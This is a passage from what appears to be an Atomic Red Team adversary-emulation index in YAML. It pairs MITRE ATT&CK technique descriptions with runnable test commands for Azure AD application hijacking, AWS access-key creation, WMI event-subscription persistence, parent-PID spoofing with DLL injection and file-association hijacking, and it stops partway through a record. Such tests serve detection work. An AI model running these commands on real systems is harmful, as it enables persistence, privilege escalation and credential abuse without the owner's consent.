Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
= ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
\"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction
Ignore > $null\n\n$app = Get-AzureADApplication -SearchString \"#{application_name}\"
| Select-Object -First 1\n$credz = Get-AzureADApplicationKeyCredential -ObjectId
$app.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
description: 'Adversaries create their own new access and secret keys to programatically
interact with AWS environment, which is already compromised
'
supported_platforms:
- iaas:aws
input_arguments:
username:
description: Create new AWS access and secret keys for the user
type: string
default: atomicredteam
dependencies:
- description: 'Check if the user exists.
'
prereq_command: 'aws iam list-users | grep #{username}
'
get_prereq_command: 'echo Please run atomic test T1136.003, before running
this atomic
'
executor:
command: |
aws iam create-access-key --user-name #{username} > "$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"
cd "$PathToAtomicsFolder/T1098.001/bin/"
./aws_secret.sh
cleanup_command: |
access_key=`cat "$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds" | jq -r '.AccessKey.AccessKeyId'`
aws iam delete-access-key --access-key-id $access_key --user-name #{username}
rm "$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds"
name: sh
T1134.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819
created: '2020-02-18T18:03:37.481Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/003
external_id: T1134.003
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: LogonUserW function
description: Microsoft. (2023, March 10). LogonUserW function (winbase.h).
Retrieved January 8, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:05.200Z'
name: Make and Impersonate Token
description: |-
Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jonny Johnson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1546.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58
created: '2020-01-24T14:07:56.276Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/003
external_id: T1546.003
- source_name: FireEye WMI 2015
description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
(WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
- source_name: Dell WMI Persistence
description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016,
March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.
url: https://www.secureworks.com/blog/wmi-persistence
- source_name: FireEye WMI SANS 2015
description: Devon Kerr. (2015). There's Something About WMI. Retrieved November
17, 2024.
url: https://web.archive.org/web/20221203203722/https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
- source_name: Medium Detecting WMI Persistence
description: French, D. (2018, October 9). Detecting & Removing an Attacker’s
WMI Persistence. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
- source_name: Elastic - Hunting for Persistence Part 1
description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft
101: Hunting for persistence using Elastic Security (Part 1). Retrieved
December 21, 2020.'
url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1
- source_name: Mandiant M-Trends 2015
description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the
Front Lines. Retrieved November 17, 2024.'
url: https://web.archive.org/web/20160629094859/https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
- source_name: Microsoft Register-WmiEvent
description: Microsoft. (n.d.). Retrieved January 24, 2020.
url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: Microsoft MOF May 2018
description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved
January 24, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:06.119Z'
name: 'Event Triggered Execution: Windows Management Instrumentation Event Subscription'
description: |-
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe` –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Brent Murphy, Elastic
- David French, Elastic
- Viren Chaudhari, Qualys
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.5'
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
description: |
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
supported_platforms:
- windows
executor:
command: |
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
cleanup_command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
name: powershell
elevation_required: true
- name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer
auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
description: |
Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
supported_platforms:
- windows
executor:
command: |
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
ScriptingEngine='VBScript';
ScriptText='
Set objws = CreateObject("Wscript.Shell")
objws.Run "notepad.exe", 0, True
'}
$Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = $Filter;
Consumer = $Consumer;
}
$FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
cleanup_command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
name: powershell
elevation_required: true
- name: Windows MOFComp.exe Load MOF File
auto_generated_guid: 29786d7e-8916-4de6-9c55-be7b093b2706
description: "The following Atomic will utilize MOFComp.exe to load a local
MOF file.\nThe Managed Object Format (MOF) compiler parses a file containing
MOF statements and adds the classes and class instances defined in the file
to the WMI repository. \nTo query for the class: gwmi __eventfilter -namespace
root\\subscription\nA successful execution will add the class to WMI root
namespace.\nReference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/
and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/.\n"
supported_platforms:
- windows
input_arguments:
mofcomp_path:
description: Location of mofcomp.exe
type: string
default: c:\windows\system32\wbem\mofcomp.exe
mof_file:
description: Local location MOF file
type: string
default: PathToAtomicsFolder\T1546.003\src\T1546.003.mof
dependency_executor_name: powershell
dependencies:
- description: 'MofComp.exe must exist on disk at specified location (#{mofcomp_path})
'
prereq_command: 'if (Test-Path "#{mofcomp_path}") { exit 0} else { exit 1}
'
get_prereq_command: 'Validate MOFComp.exe is on disk somewhere and update
input argument.
'
- description: 'MofComp.exe must exist on disk at specified location (#{mof_file})
'
prereq_command: 'if (Test-Path "#{mof_file}") { exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{mof_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.003/src/T1546.003.mof" -OutFile "#{mof_file}"
executor:
command: '#{mofcomp_path} "#{mof_file}"
'
cleanup_command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam_consumer'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam_filter'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
name: powershell
T1134.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a
created: '2020-02-18T18:22:41.448Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/004
external_id: T1134.004
- source_name: XPNSec PPID Nov 2017
description: Chester, A. (2017, November 20). Alternative methods of becoming
SYSTEM. Retrieved June 4, 2019.
url: https://blog.xpnsec.com/becoming-system/
- source_name: CounterCept PPID Spoofing Dec 2018
description: Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved
June 3, 2019.
url: https://www.countercept.com/blog/detecting-parent-pid-spoofing/
- source_name: Microsoft UAC Nov 2018
description: Montemayor, D. et al.. (2018, November 15). How User Account
Control works. Retrieved June 3, 2019.
url: https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works
- source_name: Microsoft Process Creation Flags May 2018
description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
Retrieved June 4, 2019.
url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
- source_name: Secuirtyinbits Ataware3 May 2019
description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2)
Ataware Ransomware Part 3. Retrieved June 6, 2019.
url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
- source_name: DidierStevens SelectMyParent Nov 2009
description: 'Stevens, D. (2009, November 22). Quickpost: SelectMyParent or
Playing With the Windows Process Tree. Retrieved June 3, 2019.'
url: https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/
- source_name: CTD PPID Spoofing Macro Mar 2019
description: Tafani-Dereeper, C. (2019, March 12). Building an Office macro
to spoof parent processes and command line arguments. Retrieved June 3,
2019.
url: https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:06.759Z'
name: 'Access Token Manipulation: Parent PID Spoofing'
description: |-
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
auto_generated_guid: '069258f4-2162-46e9-9a25-c9c6c56150d2'
description: |
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
calc.exe will be launched.
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
supported_platforms:
- windows
input_arguments:
parent_process_name:
description: Name of the parent process
type: string
default: explorer
spawnto_process_path:
description: Path of the process to spawn
type: path
default: C:\Program Files\Internet Explorer\iexplore.exe
dll_process_name:
description: Name of the created process from the injected dll
type: string
default: calculator
dll_path:
description: Path of the dll to inject
type: path
default: PathToAtomicsFolder\T1134.004\bin\calc.dll
spawnto_process_name:
description: Name of the process to spawn
type: string
default: iexplore
dependency_executor_name: powershell
dependencies:
- description: 'DLL to inject must exist on disk at specified location (#{dll_path})
'
prereq_command: 'if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
- description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
'
prereq_command: 'if (Test-Path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"
executor:
command: |
. "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"
$ppid=Get-Process #{parent_process_name} | select -expand id
PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"
cleanup_command: |
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
- name: Parent PID Spoofing - Spawn from Current Process
auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
description: Spawns a powershell.exe process as a child of the current process.
supported_platforms:
- windows
input_arguments:
file_path:
description: File path or name of process to spawn
type: path
default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
parent_pid:
description: PID of process to spawn from
type: string
default: "$PID"
command_line:
description: Specified command line to use
type: string
default: "-Command Start-Sleep 10"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
''#{command_line}'' -ParentId #{parent_pid}'
name: powershell
- name: Parent PID Spoofing - Spawn from Specified Process
auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
description: Spawns a notepad.exe process as a child of the current process.
supported_platforms:
- windows
input_arguments:
parent_pid:
description: PID of process to spawn from
type: string
default: "$PID"
test_guid:
description: Defined test GUID
type: string
default: 12345678-1234-1234-1234-123456789123
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
#{test_guid}'
name: powershell
- name: Parent PID Spoofing - Spawn from svchost.exe
auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
description: Spawnd a process as a child of the first accessible svchost.exe
process.
supported_platforms:
- windows
input_arguments:
command_line:
description: Specified command line to use
type: string
default: "-Command Start-Sleep 10"
file_path:
description: File path or name of process to spawn
type: path
default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
-CommandLine ''#{command_line}'''
name: powershell
- name: Parent PID Spoofing - Spawn from New Process
auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
description: Creates a notepad.exe process and then spawns a powershell.exe
process as a child of it.
supported_platforms:
- windows
input_arguments:
command_line:
description: Specified command line to use
type: string
default: "-Command Start-Sleep 10"
file_path:
description: File path or name of process to spawn
type: path
default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
parent_name:
description: Parent process to spoof from
type: path
default: "$Env:windir\\System32\\notepad.exe"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
-FilePath #{file_path} -CommandLine ''#{command_line}'''
name: powershell
T1546.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
created: '2020-01-24T13:40:47.282Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/001
external_id: T1546.001
- source_name: Microsoft Change Default Programs
description: Microsoft. (n.d.). Change which programs Windows 7 uses by default.
Retrieved July 26, 2016.
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
Retrieved September 12, 2024.
url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc
- source_name: TrendMicro TROJ-FAKEAV OCT 2012
description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August
8, 2018.
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:07.854Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
used to open the file (also called the file association or handler) is checked.
File association selections are stored in the Windows Registry and can be
edited by users, administrators, or programs that have Registry access or
by administrators using the built-in assoc utility.(Citation: Microsoft Change
Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc
Oct 2017) Applications can modify the file association for a given file extension
to call an arbitrary program when a file with the given extension is opened.\n\nSystem
file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
for that extension located at HKEY_CLASSES_ROOT\\\\[handler].
The various commands are then listed as subkeys underneath the shell key at
HKEY_CLASSES_ROOT\\\\[handler]\\shell\\\\[action]\\command. For
example: \n\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
values of the keys listed are commands that are executed when the handler
opens the file extension. Adversaries can modify these values to continually
execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1546.001
atomic_tests:
- name: Change Default File Association
auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102
description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon
successful execution, cmd.exe will change the file association of .hta to
notepad.exe. \n"
supported_platforms:
- windows
input_arguments:
target_extension_handler:
description: txtfile maps to notepad.exe
type: path
default: txtfile
extension_to_change:
description: File Extension To Hijack
type: string
default: ".hta"
original_extension_handler:
description: File Extension To Revert
type: string
default: htafile
executor:
command: 'assoc #{extension_to_change}=#{target_extension_handler}
'
cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler}
'
name: command_prompt
elevation_required: true
T1055.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
created: '2020-01-14T01:35:00.781Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/014
external_id: T1055.014
- source_name: Backtrace VDSO
description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20210205211142/https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
- source_name: Syscall 2014
description: Drysdale, D. (2014, July 16). Anatomy of a system call, part
2. Retrieved June 16, 2020.
url: https://lwn.net/Articles/604515/
- source_name: GNU Acct
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
url: https://www.gnu.org/software/acct/
- source_name: RHEL auditd
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: ArtOfMemoryForensics
